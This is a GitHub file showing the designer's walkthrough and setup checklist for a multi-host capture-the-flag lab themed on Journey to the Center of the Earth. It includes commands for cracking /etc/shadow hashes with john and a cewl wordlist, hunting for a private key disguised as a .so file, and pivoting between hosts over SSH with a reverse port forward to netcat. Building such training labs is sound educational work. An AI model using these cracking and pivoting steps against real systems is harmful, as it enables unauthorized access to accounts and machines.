ansible-c2t2/scenario.txt at master

master
Raw
 1
 2
 3gotty > student@c2t2-000-bchd
 4
 5  STEPS:
 6    0. find a throw away flag (first) 
 7       grep COG *.txt
 8    1. find the port 1863 in (ss or netstat for outbound ssh connections on the port)
 9       - watch -n1 -d ss -antp
10       - tcpdump -i ens3 not port 2222 and ip
11    2. run john on the etc passwd to get the axel user's password
12       "There sure are a lot of WORDS in this book.  Make sure to not PASS your eyes over all of them"
13       - make a wordlist from heimskringla.txt
14         sudo apt install cewl john
15         python -m SimpleHTTPServer &
16         cewl localhost:8000/heimskringla.txt -w words
17         sudo john --wordlist=words /etc/shadow
18         # HINT: only do the hash you want (avoid 656000 rounds on the student user)
19    3. find the hostname crust 
20       nslookip <IP from ss -ant>
21    4. ssh to axel@c2t2-000-crust -p 1863
22
23axel@crust
24
25  STEPS:
26    1. find the PEM private key file burried on the crust server 
27       find / -type f  2>/dev/null | grep ".so$" | xargs -I {} -P0 file {} | egrep -v "ELF|ASCII|python|terminfo"
28       ssh-keygen -l -f <FILE> 
29    2. watch the syslog that is running on crust
30       a. cat flag into the log every 5 min (cron?) -> key is there and also failed attempts to connect to port
31    3. use that key to get to lindenbrock@mantle -> no bash just a key 
32
33lindenbrock@mantle
34
35  STEPS:
36    0. no shell here -- But GatewayPorts yes 
37    1. port forward 1337 reverse to netcat to recieve a flag and a clue for how to get to core (BONUS wireguard?)
38       ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -R 0.0.0.0:1337:localhost:1337 -v
39    3. Forward tunnel to core 
40
41stromboli@core
42
43  STEPS:
44    0. play game
45
46CONFIG Changes:
47
48  bchd:
49    - <x> Add axel user to bchd with a easily john'd password
50    - <x> FLAG: /bin/nope for axel's shell
51    - <x> CLUE_FILE: Norse book with axel@crust password and flag in int
52    - <x> outbound cron job sshing to crust
53
54  crust: 
55    - <~> ssh port 1862 on crust
56    - <x> Disable student ssh login with echo shell
57    - <x> FLAG FILE: pem is somewhere on this machine - flag in it
58    - <x> rsylog server
59
60  mantle: 
61    - <x> lindenbrock public key auth
62    - <x> rsyslog client
63    - < > sshd GatewayPorts yes
64
65  core: 
66    - < > netcat cron job to mantle port 1337
67
68BONUS:
69
70change MOTD on all servers
71fake logs into crust rsyslog